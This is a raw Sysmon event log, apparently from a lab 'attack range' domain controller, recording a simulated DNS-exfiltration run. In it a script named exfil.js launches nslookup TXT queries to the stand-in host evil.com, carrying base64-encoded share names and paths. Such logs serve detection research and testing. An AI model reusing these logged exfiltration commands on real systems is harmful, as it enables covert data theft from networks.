C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A6-629A-C13D-000000005F02}3396C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljrods.tmp 2>&1 10341000x8000000000000000194353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.602{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A6-629A-C23D-000000005F02}5772C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.599{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A6-629A-C23D-000000005F02}5772C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.583{2E1864BB-17A6-629A-C23D-000000005F02}57726560C:\Windows\system32\conhost.exe{2E1864BB-17A6-629A-C13D-000000005F02}3396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.567{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-C23D-000000005F02}5772C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.567{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.567{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.567{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.567{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.567{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-C13D-000000005F02}3396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.567{2E1864BB-17A1-629A-783D-000000005F02}55521848C:\Windows\System32\WScript.exe{2E1864BB-17A6-629A-C13D-000000005F02}3396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.570{2E1864BB-17A6-629A-C13D-000000005F02}3396C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljrods.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.554{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlquwl.tmpMD5=D1A54A6F21A90F6B3FDD9CFE56E9C930,SHA256=5C5F1828A4B86FD4EE344674F6FC0762ED42C1A295A6FDEB230A8253C2750995,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.499{2E1864BB-17A6-629A-BF3D-000000005F02}65846208C:\Windows\system32\conhost.exe{2E1864BB-17A6-629A-C03D-000000005F02}7784C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.482{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.482{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.482{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.482{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.482{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-C03D-000000005F02}7784C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.482{2E1864BB-17A6-629A-BE3D-000000005F02}31408072C:\Windows\system32\cmd.exe{2E1864BB-17A6-629A-C03D-000000005F02}7784C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.485{2E1864BB-17A6-629A-C03D-000000005F02}7784C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A6-629A-BE3D-000000005F02}3140C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlquwl.tmp 2>&1 22542200x8000000000000000194333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.968{00000000-0000-0000-0000-000000000000}5392evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.858{00000000-0000-0000-0000-000000000000}7392evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.760{00000000-0000-0000-0000-000000000000}5040evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.636{00000000-0000-0000-0000-000000000000}1692evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.540{00000000-0000-0000-0000-000000000000}7036evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.439{00000000-0000-0000-0000-000000000000}1352evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.341{00000000-0000-0000-0000-000000000000}3308evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000194326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.452{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A6-629A-BF3D-000000005F02}6584C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.452{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A6-629A-BF3D-000000005F02}6584C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.435{2E1864BB-17A6-629A-BF3D-000000005F02}65846208C:\Windows\system32\conhost.exe{2E1864BB-17A6-629A-BE3D-000000005F02}3140C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.404{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-BF3D-000000005F02}6584C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.404{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.404{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.404{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.404{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.404{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-BE3D-000000005F02}3140C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 